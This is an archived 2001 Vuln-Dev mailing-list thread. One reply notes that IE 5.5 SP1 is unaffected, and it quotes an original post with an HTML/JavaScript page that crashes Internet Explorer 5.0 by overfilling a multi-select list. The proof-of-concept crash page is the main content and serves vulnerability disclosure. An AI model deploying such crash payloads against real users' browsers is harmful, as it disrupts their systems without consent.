Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

RE: IE 5.0 vulnerability

From: "Uidam, T (Tim)" <Tim.Uidam () SYD RABOBANK COM>
Date: Wed, 23 May 2001 07:06:35 +0800
Seems IE 5.5 SP1 (v5.5.4522.1800) on WinNT4 Sp5 is not susceptible...

Regards,
Tim.

-----Original Message-----
From: Thomas Magnum [mailto:dr_oo_py () hotmail com]
Sent: Wednesday, 23 May 2001 1:44
To: VULN-DEV () securityfocus com
Subject: I: IE 5.0 vulnerability


I found out a vulnerability for IE 5.0, don't know if it was already
discovered (if so, forget this). It seems that the problem is javascript.
I don't know if it is exploitable, but if I try to open an html file like
this:

<script>
function crashme() {
 var i, opt;
 for(i = 0; i < 7; i++) {
  opt = new Option('crashing...', i);
  document.vulnForm.p_select.options[i] = opt;
  document.vulnForm.p_select.options[i].selected = true;
 }
}
</script>

<html>
<head>
<title>IE 5.0 Vulnerability</title>
</head>
<body>
<form name="vulnForm">
  <table width="100%" border="0">
    <tr>
      <td align="center">
          <select name="p_select" size="5" multiple>
            <option>__________________</option>
          </select>
      </td>
    </tr>
    <tr>
      <td align="center">
          <input type="button" name="cmd" value="go!" onClick="crashme()">
      </td>
    </tr>
  </table>
</form>
</body>
</html>

I get the classical Winxx error...

I noticed that IE crashes when I try to put in the select at least 3 items
more than its size.



==================================================================
De informatie opgenomen in dit bericht kan vertrouwelijk zijn en 
is uitsluitend bestemd voor de geadresseerde. Indien u dit bericht 
onterecht ontvangt wordt u verzocht de inhoud niet te gebruiken en 
de afzender direct te informeren door het bericht te retourneren. 
==================================================================
The information contained in this message may be confidential 
and is intended to be exclusively for the addressee. Should you 
receive this message unintentionally, please do not use the contents 
herein and notify the sender immediately by return e-mail.


==================================================================
Previous By Date Next
Previous By Thread Next

Current thread: